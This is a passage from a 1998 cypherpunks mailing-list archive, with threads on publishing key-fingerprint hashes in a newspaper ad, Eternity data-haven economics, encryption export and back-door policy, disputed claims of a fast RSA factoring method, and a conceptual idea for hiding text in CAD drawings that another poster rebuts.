 Government invoked secrecy rules. It has been the same for 40 years.

 Glyn Ford hopes that his report may be the first step in a long road
 to more openness. "Some democratically elected body should surely
 have a right to know at some level. At the moment that's nowhere".

 See also in this week's issue: Pretty good Phil bounces back (a report
 on the consolidation of the reputation of Phil Zimmermann, creator of
 PGP). 14 October 1997: Europe's private parts to expand

                              * * * * *

-------------------------------------------------------------------------
Hilfe zu den BvD Mailinglisten? An- oder Abmelden?
Mail an bvd-majordomo@ibh.tfu.uni-ulm.de, Subject: egal, Text: help
ODER: http://www.fh-ulm.de/bvd

---forwarded mail END---



----------------- End Forwarded Message -----------------


<Somebody's .sig>


--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 19 Jan 1998 08:03:59 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: let's do it: NYT ad with hash of fingerprints (fwd)
Message-ID: <199801190033.SAA19067@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 18 Jan 1998 23:21:38 GMT
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: let's do it: NYT ad with hash of fingerprints

> I would have thought you would take out a cheap personals section
> advertisement and print one hash output and a URL.  The hash ouput
> would be the hash of the hashes of a chosen set of public key
> fingerprints.

This doesn't provide the same sort of protection the original full page ad
is supposed to provide. That full page ad will be accessible as a referenc
a hundred years from now in just about every library in the country. The
link to a webpage won't be.

Distinctly different security animals.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 19 Jan 1998 07:38:32 +0800
To: cypherpunks@cyberpass.net
Subject: Voice Coding Controls
Message-ID: <1.5.4.32.19980118233849.0071684c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



DM notes of the BXA Wassenaar rule for voice coding:

   After looking at some of the Wassenaar docs, I was
   surprised to see that the CCL wants to regulate speech
   encoders that operate at less than 2400 bps. Surprising
   because it was encoding, not encryption, that was being
   regulated. This is disturbing.

   This at first seemed to put some of the Nautilus development
   team's software in jeopardy, but I believe that by the letter
   of the law (or regulation) that all coders in Nautilus are not
   subject to the CCL, as they only go as low as 2400 bps
   and not less than.


For citations of voice coding in Category 5 - Telecommunications:

   http://jya.com/bxa-wa-cat5.htm#5A001b10

   http://jya.com/bxa-wa-cat5.htm#5A991b6a






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 19 Jan 1998 08:24:05 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: eternity economics (Re: (eternity) Eternity as a secure filesystem/backup medium (fwd)
Message-ID: <199801190050.SAA19224@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 18 Jan 1998 21:40:28 GMT
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: eternity economics (Re: (eternity) Eternity as a secure filesystem/backup medium

> Eternity helps here in that it obscures the poster's identity, and
> reduces their exposure in that they personally don't have to send as
> many messages.  Eternity also helps ensure continued availability, at
> least while somebody is funding that availability.

True enough, the question becomes who does that continued funding help the
most?

> Releasing the data themselves is problematic.  They may not wish to
> accept the risk.  Eternity provides a way to pay someone else to take
> the risks in ensuring availability.

Really? What is the difference? Mallet attacks the server itself who has
only the resources available from the source, which I believe can assume
safely, which is obviously less than the resource set of those who could
actualy act upon or impliment the data under discussion.

> The users is getting value for money from the eternity servers -- the
> eternity server is providing the service of risk taking.

Yes, at bargain basement prices that allow, if not even promote, a daddy
warbucks to walk in and up the ante above what the source can pay.

No, the source payment mechanism does not promote either server honesty
or long term existance of controversial data.

We're going round and round here, as I said earlier the views are
diametricaly opposite. I would suggest we drop this discussion and let us
see what happens over the next few years as it is clear that many people are
working on different implimentations. Let's let the market decide which
works best.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 19 Jan 1998 08:26:05 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: how to release code if the programmer is a target for (fwd)
Message-ID: <199801190056.SAA19276@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 18 Jan 1998 15:15:22 -0600 (CST)
> From: "Uhh...this is Joe [Randall Farmer]" <rfarmer@HiWAAY.net>
> Subject: Re: how to release code if the programmer is a target for (fwd)

> > Where does this random user come from? 
> 
> Why does it matter? As long as she's competent enough to choose good verifiers
> and verify that those verifiers verified the code in question, it all works out
> in the end. 

Because whether she is a honest user or one who is intent on subverting the
system is relevant and must be taken into account.

> We don't. There is no way to operate without *some* trust;

I disagree. I believe it is possible to create a system which is secure and
provably so, irrespective of something as nebulous as 'trust'.

> Might be, but this code has to be more than just understood -- it must be
> painstakingly checked for subtle flaws and bugs. Welcome to the world of
> adversarial quality control.

Been there it's part of what I do for a living, it's fun.

> > Which doesn't effect the ability of Mallet to resign that code at the users
> > end in order to break the users local security.
> 
> Unless you're exposing a new weakness in the trust model PGP uses, Mallet can't
> do that, providing the user has done good key authentication and hasn't listed
> one of Mallet's goons as a trusted code-verifier.

This is true if Mallet is attacking the key system, it is not strictly true
if Mallet is attacking a specific user.

> Yup, that's why the user has to check it by hand.

Then the Eternity model is doomed to fail. 90%+ of users who might want to
use a data haven model don't have a clue as to how it works or how to
actualy check it.

> Well, if you can't verify it yourself and you can't trust other people to
> verify it, my advice is to give up; you cannot be sure of *any* public keys 

I disagree, though I am not able to prove it at this time.

> keys; any sig you check might be signed by one of Mallet's keys.

My point exactly.

As with Adam, it feels like we are beginning to go around and around with
nothing new to add. I would suggest that we drop the issue for the moment
and come back to it at a later time with a little more reflection.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 19 Jan 1998 08:30:17 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Signed document - a thought... (fwd)
Message-ID: <199801190058.SAA19318@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 18 Jan 1998 21:06:28 GMT
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: Re: Signed document - a thought...

> Sounds like you are describing something which is a variant of an
> interlock protocol.  The idea of an interlock protocol is that you
> send out first a hash of what you are intending to publish.
> 
> The MITM has a problem in deciding what to publish, because they have
> to publish _a_ hash, but they don't know what it should be of.  

Exactly. I hadn't heard of the term 'interlock protocol', thanks for
the tip. I'll look into it some more.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "wabe" <wabe@smart.net>
Date: Mon, 19 Jan 1998 08:15:24 +0800
To: "Cypherpunks Distributed Remailer" <cypherpunks@ssz.com>
Subject: No Subject
Message-ID: <002a01bd2487$f3d8d2a0$d78588d1@justice>
MIME-Version: 1.0
Content-Type: text/plain



This is an e-mail which I am intentionally muddling by making it have very
long lines and stuff.
I plan on saving this too, to analyze later and try to recreate using some
sort of silly "delete
the misplaced carriage return" later.  I'm not going to sign it though.

So Bill Payne has the black box to sneakers but he won't publish it for fear
the NSA will use it
to read his e-mail and also because they pissed him off by trying to silence
his critisisms of
the way they handled something with Iran or something?  I don't read
legaleze very well....
-wabe






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Mon, 19 Jan 1998 11:23:27 +0800
To: Jim Choate <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: NTY compression proposal
In-Reply-To: <199801190230.UAA19688@einstein.ssz.com>
Message-ID: <v03102803b0e873bd7965@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:30 PM -0600 1/18/98, Jim Choate wrote:
>Hi,
>
>It has been proposed to compress the keys from 100 cypherpunks down to a 64
>character add in the NYT. Let's consider the math a moment to determine if
>this is realizable.
>
>Each key will require some sort of identifier, to make it simple lets assume
>8 characters to identify the cypherpunks and 8 bytes to represent their key
>(64-bits). This mean that each line will contain 16 bytes. With a hundred
>entries that is 1600 bytes or 12800 bits.
>
>Now 64 characters of text in a newspaper represents approx. 64 6-bit
>characters (we can't use a full 8-bit because the paper doesn't normaly
>support that many characters in normal text). This provides us with
>384 bits.
>
>The proposal leads to a requirement for an algorithm with an average
>compression factor of:
>
>12800/384 or 33.33:1 with no data loss.
>
>That's a pretty hefty compression factor for average responce.
>
>Is there a loss-less algorithm which provides this level?

Compression efficiency depends upon 1) the entropy of the input data, 2) the allowable losses and 3) finding an efficient algorithm to code for that entropy.  

For example, text rarely compress w/o loss beyond 4-5 to 1 (and 2-3 is more typical) using LZW (the defacto standard algorithm).  Images have much more correlation in their data (and therfore can be compressed more readily), but even so lossless compression beyond 3-5 to 1 is uncommon (e.g., TIFF).  JPG and other lossy algorithms need no apply.

I think I'm on fairly firm ground assuming that key data entropy is very high and therefore little or no compressible is feasible.

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 19 Jan 1998 08:34:18 +0800
To: cypherpunks@cyberpass.net
Subject: CAD Stego
Message-ID: <1.5.4.32.19980119003138.006cc150@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



This repeats a suggestion from 1994 about using computer
assisted design programs to conceal text or other data:

1. CAD uses vectors to make graphics, including text,
and most programs can import a wide variety of data from 
other formats.

2. Several features can manipulate CAD objects into
unrecognizable forms by modifying scale, dimension,
orientation, opacity and so on.

3. The scale feature is useful to reduce, say, a text
of any length, or any digital object, to the size of a pixel. 
This pixel can be located, say, under a visible line, or, be 
made transparent as a "phantom" object. (An engineer
"stipples" concrete with microdot exotica and lofts the docs
to the Saudis, getting paid ten times the regular fee.)

4. Or, the text can be distorted by scale and dimension
to appear to be a line serving another function.

5. It's a snap to encrypt the text and import
it into CAD via several programs that do that duty.
Then the message could be distorted or hidden as
described above, for piggy-backing on an innocent-
looking document issued, say, to GSA for replenishing
the Blanco Bunker, where it would be opened by the
cp insider-sou-chef for de-distorted, decrypted 
instructions on how to prepare and place the bean.

6. To be sure, the underlying CAD code of the ciphertext 
could be identified by an astute auto-message-vetter of the 
EOP and then the CADbreakers would be beckoned to 
the roachtrap.

7. Big shortcoming: how to securely transmit the location 
(virtual coordinates) of the hidden message and what 
modifications need to be reversed for message access.
Beware of using 0,0,0 -- a near-universal data point for
CAD docs. However, 0,0,2^50 miles might be overlooked
if the 3d view is disabled.

8. Medium shortcoming: Full-featured CAD programs are 
expensive, however, the popular lite versions are cheap
and can usually read the pricier output.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 19 Jan 1998 09:07:35 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: CAD Stego (fwd)
Message-ID: <199801190137.TAA19440@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 18 Jan 1998 19:31:38 -0500
> From: John Young <jya@pipeline.com>
> Subject: CAD Stego

> This repeats a suggestion from 1994 about using computer
> assisted design programs to conceal text or other data:

> 3. The scale feature is useful to reduce, say, a text
> of any length, or any digital object, to the size of a pixel. 

Assuming your color palate is deep enough to support the compression.

> 4. Or, the text can be distorted by scale and dimension
> to appear to be a line serving another function.

Don't you think they are going to wonder why *that* line is so varied in
color? Or assuming deep color pallettes, why so many colors are selected
when only a few dozen are actualy used in the drawing?

> Then the message could be distorted or hidden as
> described above, for piggy-backing on an innocent-
> looking document issued,

I suspect they'll wonder why that particular file is so much larger than
the other graphics files with the same number of layers.

> 7. Big shortcoming: how to securely transmit the location 
> (virtual coordinates) of the hidden message and what 

Look for the pixel that has the unique color mapped onto it.

> 8. Medium shortcoming: Full-featured CAD programs are 
> expensive, however, the popular lite versions are cheap
> and can usually read the pricier output.

And can't handle more than a few dozen colors and limited layering.

This suggestion is unworkable in application.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 19 Jan 1998 09:32:39 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: let's do it: NYT ad with hash of fingerprints (fwd)
Message-ID: <199801190158.TAA19549@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 18 Jan 1998 20:04:40 -0500
> From: John Young <jya@pipeline.com>
> Subject: Re: let's do it: NYT ad with hash of fingerprints (fwd)

> Printed ads are sometimes not archived as widely as news articles, due
> to the cost of reproduction, distribution and storage.

My experience with libraries is that they subscribe to the entire paper.
Place it in their archives and then at some time in the future micro-fiche
the whole paper. I have never seen a library that picked and chose what
got archived in their paper morgue's. I have done research on newspapers
going all the way back to the civil war, I have yet to find one that wasn't
archived in toto, ads and all.

> The same is true, though, of personals and other types of throwaways.

True but the point was that the data these short ads point to is *not*
archived by the same entity or necessarily any entity.

Is your webpage being archived by your local library? I be the New York
Times is.

> Adam, could you reduce the requisite gob to fit 64 characters? Each extra
> line runs about $300.

Your going to compress 100 cypherpunks 64-bit keys (I prefer 128-bit) down
to 64 characters without data loss? I wanna see *that* compression algorithm.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 19 Jan 1998 09:08:17 +0800
To: cypherpunks@cyberpass.net
Subject: Re: let's do it: NYT ad with hash of fingerprints (fwd)
Message-ID: <1.5.4.32.19980119010440.0072a198@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:

>This doesn't provide the same sort of protection the original full page ad
>is supposed to provide. That full page ad will be accessible as a reference
>a hundred years from now in just about every library in the country. The
>link to a webpage won't be.

Printed ads are sometimes not archived as widely as news articles, due
to the cost of reproduction, distribution and storage.

The same is true, though, of personals and other types of throwaways.

One possibility is to buy an ad on the NYT Front Page which is often sent
as an image around the world separately from the full paper, and on which 
one can buy a tiny ad for about $800 for two lines of text 32 characters long 
(ID must be included). That's the rate for a one-timer.

Adam, could you reduce the requisite gob to fit 64 characters? Each extra
line runs about $300.

However, bear in mind that a news article is cheaper and will be archived
for eternity (until Asteroid Endall); cheaper, that is, if you can pukedrunk a 
reviler.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 19 Jan 1998 12:34:11 +0800
To: cypherpunks@toad.com
Subject: ashcroft on encryption
Message-ID: <199801190418.UAA19045@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




------- Forwarded Message

Date:    Sun, 18 Jan 98 17:51:16 -0500
From:    vols-fan@juno.com (R L Johnson)
To:      ignition-point@majordomo.pobox.com
Subject: IP: Senator Wants Back Door to Encrypted Data Closed

http://www.wired.com/news/news/politics/story/9661.html

Senator Wants Back Door to Encrypted Data Closed
                     Reuters 

                     3:15pm  14.Jan.98.PST
                     WASHINGTON - Sounding the opening bell of a
                     renewed battle over encryption policy, Senate
                     Republican John D. Ashcroft has declared he
                     would oppose legislation that would mandate that
                     all software made in the Unites States be
                     equipped with features that would allow
                     government access to all encrypted data. 

                     "Americans must be free to communicate
                     privately, without the government listening in,"
                     Ashcroft said in a statement Tuesday. "The
                     privacy concerns here are fundamental and call for
                     serious consideration by the Senate." 

                     The Missouri Republican said he would hold a
                     hearing next month on the issue in the Senate
                     Judiciary's Constitution, Federalism, and Property
                     Rights subcommittee he chairs. 

                     Ashcroft's remarks followed a battle last year in
                     Congress over regulation of encryption technology,
                     which scrambles information and renders it
                     unreadable without a password or software "key." 

                     Encryption has become an increasingly critical
                     means of securing electronic commerce and
                     communications on the Internet. But the
                     scrambling capability can also be used by
                     criminals to hide their dealings from law
                     enforcement agencies. 

                     A bill approved by the Senate Commerce
                     Committee last year would impose strong
                     incentives to promote the use of encryption with a
                     back door to allow covert government decoding of
                     any information. And legislation approved by some
                     committees in the House would go even further,
                     requiring the back door in all products sold in the
                     United States. 

                     Ashcroft said he opposed the Senate measure,
                     sponsored by Bob Kerrey, Democrat of Nebraska,
                     and John McCain, Republican of Arizona. Majority
                     Leader Trent Lott asked Ashcroft to "pay special
                     attention" to the issue, Ashcroft said. 


**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     subscribe ignition-point email@address
or
     unsubscribe ignition-point email@address
**********************************************
http://www.telepath.com/believer
**********************************************

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 19 Jan 1998 10:02:02 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: NTY compression proposal
Message-ID: <199801190230.UAA19688@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

It has been proposed to compress the keys from 100 cypherpunks down to a 64
character add in the NYT. Let's consider the math a moment to determine if
this is realizable.

Each key will require some sort of identifier, to make it simple lets assume
8 characters to identify the cypherpunks and 8 bytes to represent their key
(64-bits). This mean that each line will contain 16 bytes. With a hundred
entries that is 1600 bytes or 12800 bits.

Now 64 characters of text in a newspaper represents approx. 64 6-bit
characters (we can't use a full 8-bit because the paper doesn't normaly
support that many characters in normal text). This provides us with
384 bits.

The proposal leads to a requirement for an algorithm with an average
compression factor of:

12800/384 or 33.33:1 with no data loss.

That's a pretty hefty compression factor for average responce.

Is there a loss-less algorithm which provides this level?


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 19 Jan 1998 12:42:16 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: proving that one knows how to break RSA
In-Reply-To: <199801182343.XAA00268@server.eternity.org>
Message-ID: <199801190434.UAA20448@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>Dimitri Vulis <dlv@bwalk.dm.com> writes:
>> Bill Payne was with Sandia national lab (where they quite a bit of
>> crypto work) Bill claims to have discovered a very fast
>> factorization algorithm using shift registers, which he refuses to
>> publish. While I haven't seen the algorithm, I believe he may well
>> be right.

I think this ought to be nipped in the bud right now if not true.
I've heard rumors on this list about algorithms but attributing it to
someone at Sandia is pretty substantial however I think DV's claim
above sounds totally bogus. if anyone else can comment please do.
I don't so much want to know whether he has discovered an algorithm
at this point, only whether someone at Sandia claims to have
discovered a fast factoring algorithm. after that-- well, what
exactly is "fast"?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 19 Jan 1998 12:44:40 +0800
To: cypherpunks@cyberpass.net
Subject: movie "good will hunting"
Message-ID: <199801190440.UAA20828@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




highly recommend this movie, "good will hunting". excellent
script that will leave you startled at times. plot is that
a young kid from a very rough background who is a janitor
at MIT seems to be a math genius possibly on the level
of Ramanujan.

reason I am posting here: there's a really great rant by
the character at one point as he sits in an office with
an NSA rep and a medal-laced general and insults them about
a job offer in the agency to work under classified conditions.
the NSA rep offers him math research into state of the art
theory but requires that the work be classified. I think
there is a line about how the NSA has 7 times the budget
of the CIA but they don't like to make that well known.
(one might say it was sort of a rant on the morality of
confidentiality. <g>)

if anyone would care to tape this and post a transcript
I think it would be very interesting to other cpunks. its
a rare reference to NSA in the popular media.

of course not on the level of "sneakers" as far as 
crypto references, but an interesting snippet nonetheless,
and I think that some people here might identify a lot with
the protagonist.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 19 Jan 1998 10:25:09 +0800
To: cypherpunks@toad.com
Subject: Re: proving that one knows how to break RSA
In-Reply-To: <199801182343.XAA00268@server.eternity.org>
Message-ID: <iV7iJe30w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Back <aba@dcs.ex.ac.uk> writes:
> Dimitri Vulis <dlv@bwalk.dm.com> writes:
> > Bill Payne was with Sandia national lab (where they quite a bit of
> > crypto work) Bill claims to have discovered a very fast
> > factorization algorithm using shift registers, which he refuses to
> > publish. While I haven't seen the algorithm, I believe he may well
> > be right.
>
> Bill Payne's claim to having discovered a faster factorization
> algorithm than the current state of the art, allows us to invoke the
> oft discussed mechanisms for the author to prove this ability without
> divulging the algorithm, and then proceed to sell the algorithm to the
> highest bidder, whilst minimizing his chances of being killed.
...
I believe Bill is genuinely afraid that if he published his algorithm,
then he'll be killed. I don't know enough to judge how realistic his
fear is. I've been involved in serious discussions of assassinations
over smaller amounts of money than is at stake here. He displays great
courage by saying anything at all at this point.

I also have an extremely high opinion of Bill's (and Adam Back's) technical
abiltities. That is, I'd be much less surprised if Bill Payne (or Adam Back)
comes up with some truly remarkable breakthrough than someone I've never
heard of or someone I heard of and don't have such a high opinion of.

Yes, it would be most interesting/impressive if Bill demonstrated his
ability to factor using some of the published chalenges.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. Alan Sherman" <sherman@gl.umbc.edu>
Date: Mon, 19 Jan 1998 10:07:49 +0800
To: Crypto Announce <theory-local@cs.umd.edu
Subject: Barry Smith (FBI) to speak on encryption policy
Message-ID: <Pine.SGI.3.91.980118204925.28620F-100000@pomeranian.cs.umbc.edu>
MIME-Version: 1.0
Content-Type: text/plain



   The UMBC Security Technology Research Group presents

     A Law-Enforcement Perspective on Encryption Policy

			Barry Smith
	       Supervisory Special Agent, FBI

	    moderated by journalist Peter Wayner

		      3:30pm - 5:00pm
		   Friday, March 6, 1998
	Lecture Hall V (LOCATION SUBJECT TO CHANGE)
	  University of Maryland, Baltimore County
    http://www.cs.umbc.edu/events/spring98/crypto.shtml

The second lecture and discussion in a two-part forum on
encryption policy.  Journalist Peter Wayner will introduce
and moderate the event, which is free and open to the
public.  In Part I, freedom activist John Gilmore and Fritz
Fielding (Ex-Associate General Councel, NSA) gave their
divergent views, focusing on the Burnstein case.

Barry Smith will articulate the needs of law enforcement to
conduct lawful wiretaps; he will advocate the use of
key-recovery techniques to achieve this end as a way that
provides adequate privacy to law-abiding citizens.

Schedule: The event will begin with a brief (10 minute)
introduction by Peter Wayner.  Following Barry Smith's talk,
which will last approximately 45 minutes, there will be an
opportunity to ask questions for approximately 20-30
minutes.

Questions: Attendees are encouraged to ask questions in
advance by sending email to sherman@cs.umbc.edu

Directions: Take Exit #47B off interstate I-95 and follow
signs to UMBC.  LH V is on the 100-level of the Engineering
Computer Science (ECS) Building, directly behind the
University Center.  There is a visitor's parking lot near
the I-95 entrance to UMBC.

Host: Dr. Alan T. Sherman
      Associate Professor, Computer Science
      sherman@cs.umbc.edu
      http://www.umbc.edu
      (410) 455-2666

     This event is held in cooperation with the UMBC
	       Intellectual Sports Council
		       Honors College
	       Phi Beta Kappa honors society
                   CMSC Council of Majors
		   IFSM Council of Majors






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Mon, 19 Jan 1998 13:10:27 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: proving that one knows how to break RSA
In-Reply-To: <199801182343.XAA00268@server.eternity.org>
Message-ID: <3.0.5.32.19980118205744.03638ca0@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



At 08:34 PM 1/18/98 -0800, Vladimir Z. Nuri wrote:

>I think this ought to be nipped in the bud right now if not true.
>I've heard rumors on this list about algorithms but attributing it to
>someone at Sandia is pretty substantial however I think DV's claim
>above sounds totally bogus. if anyone else can comment please do.
>I don't so much want to know whether he has discovered an algorithm
>at this point, only whether someone at Sandia claims to have
>discovered a fast factoring algorithm. after that-- well, what
>exactly is "fast"?

Payne's previous claims were examined on one of the other crypto lists a
few months ago.  (Actually "ripped apart" is a better term.)  Wei Dei and a
few others examined the mathmatical basis of his "break" of RSA.  Turns out
that is is not nearly the shortcut claimed.  (Actually not a shortcut at all.)

Based on that previous experience, I would be very suspect of such a claim
from Mr. Payne without any proof.

---
|              "That'll make it hot for them!" - Guy Grand               |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 19 Jan 1998 06:16:28 +0800
To: ravage@ssz.com
Subject: Re: Signed document - a thought...
In-Reply-To: <199801181631.KAA17197@einstein.ssz.com>
Message-ID: <199801182106.VAA00440@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



Sounds like you are describing something which is a variant of an
interlock protocol.  The idea of an interlock protocol is that you
send out first a hash of what you are intending to publish.

The MITM has a problem in deciding what to publish, because they have
to publish _a_ hash, but they don't know what it should be of.  

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Crispin <kent@songbird.com>
Date: Mon, 19 Jan 1998 13:37:33 +0800
To: Cypherpunks Distributed Remailer <cypherpunks@ssz.com>
Subject: Re: (eternity) Eternity as a secure filesystem/backup medium (fwd)
